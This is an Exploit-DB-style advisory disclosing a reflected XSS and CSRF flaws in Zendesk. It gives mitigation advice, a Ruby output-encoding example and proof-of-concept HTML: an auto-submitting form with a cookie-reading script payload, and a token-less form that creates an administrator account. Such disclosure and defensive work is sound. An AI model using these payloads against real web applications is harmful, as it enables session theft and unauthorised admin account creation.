Vendor: Zendesk
By: Luis Santana
CVSS: 8.8 (HIGH)
Vulnerability Type: Multiple
CWE: 79, 352
Product Name: Zendesk
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Zendesk Multiple Vulnerabilities

Luis Santana of the HackTalk Security team has found multiple vulnerabilities in Zendesk. These include a reflected XSS in the email address field of the anonymous_requests page, where the submitted value is echoed back into the page without HTML encoding, and CSRF in many forms, which accept state-changing POST requests without an anti-forgery token. The most notable example is the new user creation form: an attacker who gets a logged-in administrator to visit a page under the attacker's control can use it to create a new administrative user.

Mitigation:

XSS: HTML-encode the email value, and every other user-supplied value, at the point where it is written back into the page, rather than relying on input sanitation alone. CSRF is not an input-sanitation problem: every state-changing form and request should carry a per-session anti-forgery token that the server verifies before acting, and the Origin/Referer header of POST requests should be checked against the help desk's own origin.

Exploit-DB raw data:

/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\
:Zendesk Multiple Vulnerabilities :
\________________________________/
/Discovered By:                  \
|Luis Santana                     |
\________________________________/


Overview

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Luis Santana of the HackTalk Security team has found multiple vulnerabilities in Zendesk.

Product Information

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Product/Script: Zendesk

Affected Version:

Vulnerability Type: Multiple

Security Risk: Multiple

Vendor URL: http://zendesk.com

Product/Script Demo:

Vendor Status: Notified

Patch/Fix Status: Patches Made

Advisory Timeline:  July 31st 9:34am EST - Zendesk Contacted about XSS
                    July 31st 12:42pm EST - Ticket passed to Security Department
                    July 31st 10:46pm EST - Zendesk has started producing patch. Given the go ahead to publicly disclose
                    July 31st 1:00am EST - Found CSRF, continuing investigation
                    August 1st 3:49pm EST - CSRF Patch in production
                    August 4th 3:51am EST - CSRF patch being rolled out
                    August 10th 3:36pm EST - Given the ok to post advisory publicly

Advisory URL: http://hacktalk.net/exploit/exploit.php?n=10

Product Description

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Web-based customer support software with elegant ticket management and a self-service customer community platform. Agile, smart and convenient.

(From http://www.zendesk.com)

Vulnerability Details

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

XSS -
The email address field of the anonymous_requests page is vulnerable to reflected XSS: the submitted value is written back into the page without HTML encoding. By crafting a malicious POST request an attacker can break out of the attribute the value is echoed into and inject arbitrary HTML or JavaScript into the anonymous_requests page, for example to read the victim's cookie as the proof of concept below does.
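To make the XSS concrete, here is an added example, written for this page rather than taken from the advisory or from Zendesk's code, of a hypothetical page that echoes the email parameter back into an input's value attribute. The vulnerable renderer interpolates the value raw, as the advisory describes; the hardened one HTML-encodes it at output time with Ruby's stdlib CGI.escapeHTML. The form markup, route and function names are assumptions made for illustration; the payload is the advisory's own.

```ruby
# Added example (not from the advisory): how the anonymous_requests email
# field becomes an XSS sink, and the fix. The page that echoes the value is
# hypothetical; only the payload comes from the advisory.
require 'cgi'

# The advisory's payload: closes the value attribute, closes the <input>
# tag, then starts a <script> element of its own.
PAYLOAD = %q{"><script>alert("I could have just stolen your cookie" + document.cookie);</script>}

# Vulnerable rendering: the submitted value is interpolated into an HTML
# attribute with no encoding, so the ">" in the payload ends the attribute
# and the tag, and the <script> that follows is parsed as real markup.
def render_vulnerable(email)
  '<form method="POST" action="/anonymous_requests">' +
    "<input type=\"text\" name=\"email\" value=\"#{email}\">" +
    '</form>'
end

# Hardened rendering: HTML-encode the value at output time. CGI.escapeHTML
# turns " into &quot;, < into &lt; and > into &gt;, so the value can no
# longer terminate the attribute or the tag, whatever was submitted.
def render_hardened(email)
  '<form method="POST" action="/anonymous_requests">' +
    "<input type=\"text\" name=\"email\" value=\"#{CGI.escapeHTML(email)}\">" +
    '</form>'
end

# Check a tester can run against the rendered response: did the reflected
# value produce a live <script> element (i.e. a "<script" outside any
# attribute or entity)? Encoded output contains "&lt;script", never "<script".
def script_injected?(html)
  html.match?(/<script[\s>]/i)
end

if __FILE__ == $0
  [[:vulnerable, render_vulnerable(PAYLOAD)],
   [:hardened,   render_hardened(PAYLOAD)]].each do |label, html|
    puts "#{label}: script injected = #{script_injected?(html)}"
    puts "  #{html}"
  end
end
```

Note that the fix is contextual output encoding, not input filtering: the same address must still be stored and mailed unchanged, and a blacklist on the way in would miss the next encoding trick, whereas encoding at the sink is safe for every value.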

CSRF -
Many forms are vulnerable to CSRF because they accept state-changing POST requests without an anti-forgery token, so a page under the attacker's control can submit them and the victim's browser will attach the victim's session cookies. The most notable example is the new user creation form, which lets an attacker create a new administrative user when a logged-in administrator visits the attacker's page.

Proof of Concept

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

XSS -

<html>
<head></head>
<body>
<!-- Posts the payload to the vulnerable page automatically one second after load -->
<form method="POST" action="https://site.com/anonymous_requests" name="explForm">
<input type="hidden" name="email" value='"><script>alert("I could have just stolen your cookie" + document.cookie);</script>' />
</form>
<script>
setTimeout(function () { document.explForm.submit(); }, 1000 * 1);
</script>
</body>
</html>


CSRF -

The form below mirrors the help desk's own user-creation form and carries no anti-forgery token. Hosted on an attacker-controlled page and submitted by a browser that is logged in to the help desk as an administrator, it creates the user it describes; selecting the Admin role (the user[roles] radio with value 2 below) creates a new administrative user.

<form action="http://site.com/users" class="new_user" enctype="multipart/form-data" id="user-form" method="post" name="userform" onsubmit="return submitUser()">

  <input id="ignore-upload-user" name="ignoreupload" type="hidden" value="0" />

  <h2>Name <span class="sub">Display name used throughout the help desk.</span></h2>

  <input id="user_name" name="user[name]" size="30" type="text" />

  <!--<p>Display name used throughout the help desk.</p>-->

          <h3>

        Email

        <span class="sub">Used when logging in.</span>

      </h3>

      <input id="user_email" name="user[email]" size="30" type="text" />

      <h3>

        Twitter account

      </h3>

      <input id="user_new_twitter_identity" name="user[new_twitter_identity]" size="30" type="text" />

  <h3>Phone number <span class="sub">Optional.</span></h3>

  <input id="user_phone" name="user[phone]" size="30" type="text" />

  <h3>Time zone</h3>

     <select id="user_time_zone" name="user[time_zone]"><option value="International Date Line West">(GMT-11:00) International Date Line West</option>

<option value="Midway Island">(GMT-11:00) Midway Island</option>

<option value="Samoa">(GMT-11:00) Samoa</option>

<option value="Hawaii">(GMT-10:00) Hawaii</option>

<option value="Alaska">(GMT-09:00) Alaska</option>

<option value="Pacific Time (US & Canada)">(GMT-08:00) Pacific Time (US & Canada)</option>

<option value="Tijuana">(GMT-08:00) Tijuana</option>

<option value="Arizona">(GMT-07:00) Arizona</option>

<option value="Chihuahua">(GMT-07:00) Chihuahua</option>

<option value="Mazatlan">(GMT-07:00) Mazatlan</option>

<option value="Mountain Time (US & Canada)">(GMT-07:00) Mountain Time (US & Canada)</option>

<option value="Central America">(GMT-06:00) Central America</option>

<option value="Central Time (US & Canada)">(GMT-06:00) Central Time (US & Canada)</option>

<option value="Guadalajara">(GMT-06:00) Guadalajara</option>

<option value="Mexico City">(GMT-06:00) Mexico City</option>

<option value="Monterrey">(GMT-06:00) Monterrey</option>

<option value="Saskatchewan">(GMT-06:00) Saskatchewan</option>

<option value="Bogota" selected="selected">(GMT-05:00) Bogota</option>

<option value="Eastern Time (US & Canada)">(GMT-05:00) Eastern Time (US & Canada)</option>

<option value="Indiana (East)">(GMT-05:00) Indiana (East)</option>

<option value="Lima">(GMT-05:00) Lima</option>

<option value="Quito">(GMT-05:00) Quito</option>

<option value="Caracas">(GMT-04:30) Caracas</option>

<option value="Atlantic Time (Canada)">(GMT-04:00) Atlantic Time (Canada)</option>

<option value="La Paz">(GMT-04:00) La Paz</option>

<option value="Santiago">(GMT-04:00) Santiago</option>

<option value="Newfoundland">(GMT-03:30) Newfoundland</option>

<option value="Brasilia">(GMT-03:00) Brasilia</option>

<option value="Buenos Aires">(GMT-03:00) Buenos Aires</option>

<option value="Georgetown">(GMT-03:00) Georgetown</option>

<option value="Greenland">(GMT-03:00) Greenland</option>

<option value="Mid-Atlantic">(GMT-02:00) Mid-Atlantic</option>

<option value="Azores">(GMT-01:00) Azores</option>

<option value="Cape Verde Is.">(GMT-01:00) Cape Verde Is.</option>

<option value="Casablanca">(GMT+00:00) Casablanca</option>

<option value="Dublin">(GMT+00:00) Dublin</option>

<option value="Edinburgh">(GMT+00:00) Edinburgh</option>

<option value="Lisbon">(GMT+00:00) Lisbon</option>

<option value="London">(GMT+00:00) London</option>

<option value="Monrovia">(GMT+00:00) Monrovia</option>

<option value="UTC">(GMT+00:00) UTC</option>

<option value="Amsterdam">(GMT+01:00) Amsterdam</option>

<option value="Belgrade">(GMT+01:00) Belgrade</option>

<option value="Berlin">(GMT+01:00) Berlin</option>

<option value="Bern">(GMT+01:00) Bern</option>

<option value="Bratislava">(GMT+01:00) Bratislava</option>

<option value="Brussels">(GMT+01:00) Brussels</option>

<option value="Budapest">(GMT+01:00) Budapest</option>

<option value="Copenhagen">(GMT+01:00) Copenhagen</option>

<option value="Ljubljana">(GMT+01:00) Ljubljana</option>

<option value="Madrid">(GMT+01:00) Madrid</option>

<option value="Paris">(GMT+01:00) Paris</option>

<option value="Prague">(GMT+01:00) Prague</option>

<option value="Rome">(GMT+01:00) Rome</option>

<option value="Sarajevo">(GMT+01:00) Sarajevo</option>

<option value="Skopje">(GMT+01:00) Skopje</option>

<option value="Stockholm">(GMT+01:00) Stockholm</option>

<option value="Vienna">(GMT+01:00) Vienna</option>

<option value="Warsaw">(GMT+01:00) Warsaw</option>

<option value="West Central Africa">(GMT+01:00) West Central Africa</option>

<option value="Zagreb">(GMT+01:00) Zagreb</option>

<option value="Athens">(GMT+02:00) Athens</option>

<option value="Bucharest">(GMT+02:00) Bucharest</option>

<option value="Cairo">(GMT+02:00) Cairo</option>

<option value="Harare">(GMT+02:00) Harare</option>

<option value="Helsinki">(GMT+02:00) Helsinki</option>

<option value="Istanbul">(GMT+02:00) Istanbul</option>

<option value="Jerusalem">(GMT+02:00) Jerusalem</option>

<option value="Kyev">(GMT+02:00) Kyev</option>

<option value="Minsk">(GMT+02:00) Minsk</option>

<option value="Pretoria">(GMT+02:00) Pretoria</option>

<option value="Riga">(GMT+02:00) Riga</option>

<option value="Sofia">(GMT+02:00) Sofia</option>

<option value="Tallinn">(GMT+02:00) Tallinn</option>

<option value="Vilnius">(GMT+02:00) Vilnius</option>

<option value="Baghdad">(GMT+03:00) Baghdad</option>

<option value="Kuwait">(GMT+03:00) Kuwait</option>

<option value="Moscow">(GMT+03:00) Moscow</option>

<option value="Nairobi">(GMT+03:00) Nairobi</option>

<option value="Riyadh">(GMT+03:00) Riyadh</option>

<option value="St. Petersburg">(GMT+03:00) St. Petersburg</option>

<option value="Volgograd">(GMT+03:00) Volgograd</option>

<option value="Tehran">(GMT+03:30) Tehran</option>

<option value="Abu Dhabi">(GMT+04:00) Abu Dhabi</option>

<option value="Baku">(GMT+04:00) Baku</option>

<option value="Muscat">(GMT+04:00) Muscat</option>

<option value="Tbilisi">(GMT+04:00) Tbilisi</option>

<option value="Yerevan">(GMT+04:00) Yerevan</option>

<option value="Kabul">(GMT+04:30) Kabul</option>

<option value="Ekaterinburg">(GMT+05:00) Ekaterinburg</option>

<option value="Islamabad">(GMT+05:00) Islamabad</option>

<option value="Karachi">(GMT+05:00) Karachi</option>

<option value="Tashkent">(GMT+05:00) Tashkent</option>

<option value="Chennai">(GMT+05:30) Chennai</option>

<option value="Kolkata">(GMT+05:30) Kolkata</option>

<option value="Mumbai">(GMT+05:30) Mumbai</option>

<option value="New Delhi">(GMT+05:30) New Delhi</option>

<option value="Sri Jayawardenepura">(GMT+05:30) Sri Jayawardenepura</option>

<option value="Kathmandu">(GMT+05:45) Kathmandu</option>

<option value="Almaty">(GMT+06:00) Almaty</option>

<option value="Astana">(GMT+06:00) Astana</option>

<option value="Dhaka">(GMT+06:00) Dhaka</option>

<option value="Novosibirsk">(GMT+06:00) Novosibirsk</option>

<option value="Rangoon">(GMT+06:30) Rangoon</option>

<option value="Bangkok">(GMT+07:00) Bangkok</option>

<option value="Hanoi">(GMT+07:00) Hanoi</option>

<option value="Jakarta">(GMT+07:00) Jakarta</option>

<option value="Krasnoyarsk">(GMT+07:00) Krasnoyarsk</option>

<option value="Beijing">(GMT+08:00) Beijing</option>

<option value="Chongqing">(GMT+08:00) Chongqing</option>

<option value="Hong Kong">(GMT+08:00) Hong Kong</option>

<option value="Irkutsk">(GMT+08:00) Irkutsk</option>

<option value="Kuala Lumpur">(GMT+08:00) Kuala Lumpur</option>

<option value="Perth">(GMT+08:00) Perth</option>

<option value="Singapore">(GMT+08:00) Singapore</option>

<option value="Taipei">(GMT+08:00) Taipei</option>

<option value="Ulaan Bataar">(GMT+08:00) Ulaan Bataar</option>

<option value="Urumqi">(GMT+08:00) Urumqi</option>

<option value="Osaka">(GMT+09:00) Osaka</option>

<option value="Sapporo">(GMT+09:00) Sapporo</option>

<option value="Seoul">(GMT+09:00) Seoul</option>

<option value="Tokyo">(GMT+09:00) Tokyo</option>

<option value="Yakutsk">(GMT+09:00) Yakutsk</option>

<option value="Adelaide">(GMT+09:30) Adelaide</option>

<option value="Darwin">(GMT+09:30) Darwin</option>

<option value="Brisbane">(GMT+10:00) Brisbane</option>

<option value="Canberra">(GMT+10:00) Canberra</option>

<option value="Guam">(GMT+10:00) Guam</option>

<option value="Hobart">(GMT+10:00) Hobart</option>

<option value="Melbourne">(GMT+10:00) Melbourne</option>

<option value="Port Moresby">(GMT+10:00) Port Moresby</option>

<option value="Sydney">(GMT+10:00) Sydney</option>

<option value="Vladivostok">(GMT+10:00) Vladivostok</option>

<option value="Magadan">(GMT+11:00) Magadan</option>

<option value="New Caledonia">(GMT+11:00) New Caledonia</option>

<option value="Solomon Is.">(GMT+11:00) Solomon Is.</option>

<option value="Auckland">(GMT+12:00) Auckland</option>

<option value="Fiji">(GMT+12:00) Fiji</option>

<option value="Kamchatka">(GMT+12:00) Kamchatka</option>

<option value="Marshall Is.">(GMT+12:00) Marshall Is.</option>

<option value="Wellington">(GMT+12:00) Wellington</option>

<option value="Nuku'alofa">(GMT+13:00) Nuku'alofa</option><option value="" disabled="disabled">-------------</option>

</select>

  <a name="photo">

      <h3>Photo <span class="sub">An optional smiling face. For the best results, upload a photo with equal length and height.</span></h3>

      <input id="photo_uploaded_data" name="photo[uploaded_data]" type="file" />

  </a>

    <h3>Detailed information</h3>

    <textarea cols="60" id="user_details" name="user[details]" rows="5"></textarea>

    <p>Optional detailed information concerning this user, e.g. an address. This information is visible to agents only, never to end-users.</p>

    <h3>Notes</h3>

    <textarea cols="60" id="user_notes" name="user[notes]" rows="5"></textarea>

    <p>Optional notes concerning this user. Notes can also be added/edited for a requester directly on the ticket form page.<br/>Notes are visible to agents only, never to any end-user.</p>

      <div id="organization-block">

          <h3>Organization</h3>

 <select id="user_organization_id" name="user[organization_id]" style="width:auto;"><option value="">(None)</option>

<option value="237057">HackTalk Security</option></select>

          <p>Leave blank to select default organization according to organization mappings.</p>

      </div>

      <h3>Role - privileges granted to this user</h3>

      <h4>

        <input checked="checked" id="user-radio" name="user[roles]" onclick="checkAgent();" type="radio" value="0" />

        End-user.

        <span class="sub">Submits support tickets to the help desk.</span>

      </h4>

      <div id="end_user_block" class="indented_option" style="">

        <h4>Has access to:</h4>

        <p><input checked="checked" id="user_restriction_id_4" name="user[restriction_id]" type="radio" value="4" /> Tickets requested by user only</p>

          <p><input id="user_restriction_id_2" name="user[restriction_id]" type="radio" value="2" /> Tickets from user's organization</p>

          <p>Note - if the user belongs to a shared organization, then the user always has access to tickets in the organization.</p>

      </div>

        <h4>

          <input id="user_roles_4" name="user[roles]" onclick="checkAgent();" type="radio" value="4" />

          Agent.

          <span class="sub">Help desk operator. Receives and resolves tickets from end-users.</span>

        </h4>

        <div id="agent_block" class="indented_option" style="display:none;">

          <div id="agent_groups"></div>

          <h4>Has access to:</h4>

          <p><input id="user_restriction_id_0" name="user[restriction_id]" type="radio" value="0" /> All tickets <span class="sub">(can also add, modify and assume end-users)</span></p>

            <p>

                <input type="radio" value="2" name="user[restriction_id]" id="snov"/>

              Tickets requested by users in this agent's organization <span class="sub">(also can't see forums restricted to other organizations)</span>

            </p>

          <p><input id="user_restriction_id_3" name="user[restriction_id]" type="radio" value="3" /> Tickets assigned to this agent only</p>

          <h4>Can add ticket comments that are:</h4>

          <p>

          <label class="option"><input checked="checked" class="radio" id="user_is_private_comments_only_false" name="user[is_private_comments_only]" type="radio" value="false" /> Public or private</label>

          <label class="option"><input class="radio" id="user_is_private_comments_only_true" name="user[is_private_comments_only]" type="radio" value="true" /> Private only (viewable only by other agents)</label>

          </p>

          <h4>Can moderate (edit, delete and reorder) topics in forums:</h4>

          <p>

            <label class="option"><input class="radio" id="user_is_moderator_true" name="user[is_moderator]" type="radio" value="true" /> Yes</label>

            <label class="option"><input checked="checked" class="radio" id="user_is_moderator_false" name="user[is_moderator]" type="radio" value="false" /> No</label>

          </p>

        </div>

        <h4>

          <input id="user_roles_2" name="user[roles]" onclick="checkAgent();" type="radio" value="2" />

          Admin.

          <span class="sub">Manages the help desk with regard to rules, users, organizations, groups and SLA's. Has access to all tickets.</span>

          <div id="admin_groups" class="indented_option"></div>

        </h4>

  <div class="action">

    <input class="buttonsubmit" id="submit-button" name="commit" type="submit" value="Create" />

  </div>
</form>


Patch/Fix Suggestion(s)

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

Upgrade to the latest version of Zendesk as they have released patches for these vulnerabilities.

Security Risk

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

XSS - Low

CSRF - Mid

Author:

~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~

The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team